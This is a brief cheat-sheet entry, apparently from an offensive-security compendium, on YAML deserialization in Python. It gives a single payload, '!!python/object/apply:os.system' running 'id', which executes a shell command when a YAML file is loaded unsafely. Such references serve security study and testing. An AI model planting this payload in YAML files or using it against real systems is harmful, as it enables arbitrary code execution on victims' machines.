killchain-compendium/exploit/yaml/deserialization.md

363 B

YAML Deserialization

Usage

  • Example Payload insid foo.yaml gets executed via Python
!!python/object/apply:os.system ["id"]